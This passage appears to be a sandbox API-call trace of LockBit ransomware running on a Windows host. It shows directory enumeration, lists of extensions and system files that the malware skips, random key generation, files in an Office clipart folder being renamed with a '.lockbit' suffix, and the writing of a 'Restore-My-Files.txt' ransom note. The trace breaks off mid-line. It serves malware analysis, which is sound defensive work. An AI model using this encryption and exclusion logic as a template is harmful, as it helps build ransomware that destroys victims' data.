CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.520] malloc (_Size=0x40068) returned 0x3df0008 [0150.520] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=49676) returned 1 [0150.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.521] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.521] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.526] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198447.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198447.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.526] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.526] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.529] free (_Block=0x1fa2ed8) [0150.529] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198447.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.529] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.530] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.530] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56536e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xae08, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198494.WMF", cAlternateFileName="")) returned 1 [0150.530] lstrcmpiW (lpString1=".", lpString2="J0198494.WMF") returned -1 [0150.530] lstrcmpiW (lpString1="..", lpString2="J0198494.WMF") returned -1 [0150.530] PathFindExtensionW (pszPath="J0198494.WMF") returned=".WMF" [0150.530] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.530] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.530] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.530] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.530] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.530] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.530] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.530] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.530] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.530] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.530] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.541] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.541] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198494.WMF") returned 1 [0150.542] lstrcmpiW (lpString1="ntldr", lpString2="J0198494.WMF") returned 1 [0150.542] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198494.WMF") returned 1 [0150.542] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198494.WMF") returned -1 [0150.542] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198494.WMF") returned -1 [0150.542] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198494.WMF") returned 1 [0150.542] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198494.WMF") returned -1 [0150.542] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.542] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198494.WMF") returned=".WMF" [0150.542] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.542] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.542] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.543] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.543] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198494.WMF.lockbit") returned 72 [0150.543] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198494.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198494.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.545] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.545] malloc (_Size=0x40068) returned 0x3df0008 [0150.545] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=44552) returned 1 [0150.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.546] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.551] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198494.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198494.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.551] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.551] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.553] free (_Block=0x1fa2ed8) [0150.553] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198494.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.553] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.553] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.553] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56536e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0198712.WMF", cAlternateFileName="")) returned 1 [0150.553] lstrcmpiW (lpString1=".", lpString2="J0198712.WMF") returned -1 [0150.553] lstrcmpiW (lpString1="..", lpString2="J0198712.WMF") returned -1 [0150.553] PathFindExtensionW (pszPath="J0198712.WMF") returned=".WMF" [0150.553] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.553] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.553] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.553] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.553] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.553] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.554] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.554] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.555] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0198712.WMF") returned 1 [0150.555] lstrcmpiW (lpString1="ntldr", lpString2="J0198712.WMF") returned 1 [0150.555] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0198712.WMF") returned 1 [0150.555] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0198712.WMF") returned -1 [0150.555] lstrcmpiW (lpString1="autorun.inf", lpString2="J0198712.WMF") returned -1 [0150.555] lstrcmpiW (lpString1="thumbs.db", lpString2="J0198712.WMF") returned 1 [0150.556] lstrcmpiW (lpString1="iconcache.db", lpString2="J0198712.WMF") returned -1 [0150.556] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.556] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198712.WMF") returned=".WMF" [0150.556] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.556] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.556] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.557] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.557] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.557] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.557] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.557] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.557] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.557] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198712.WMF.lockbit") returned 72 [0150.557] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198712.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0198712.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.558] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.558] malloc (_Size=0x40068) returned 0x3df0008 [0150.558] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=57722) returned 1 [0150.558] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.559] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.559] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.559] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.564] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198712.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198712.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.564] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.564] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.568] free (_Block=0x1fa2ed8) [0150.568] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0198712.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.568] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.568] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.568] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56536e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x714e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199279.WMF", cAlternateFileName="")) returned 1 [0150.568] lstrcmpiW (lpString1=".", lpString2="J0199279.WMF") returned -1 [0150.568] lstrcmpiW (lpString1="..", lpString2="J0199279.WMF") returned -1 [0150.568] PathFindExtensionW (pszPath="J0199279.WMF") returned=".WMF" [0150.568] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.568] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.568] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.568] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.568] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.568] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.568] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.568] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.568] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.568] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.568] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.569] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.569] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.570] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") 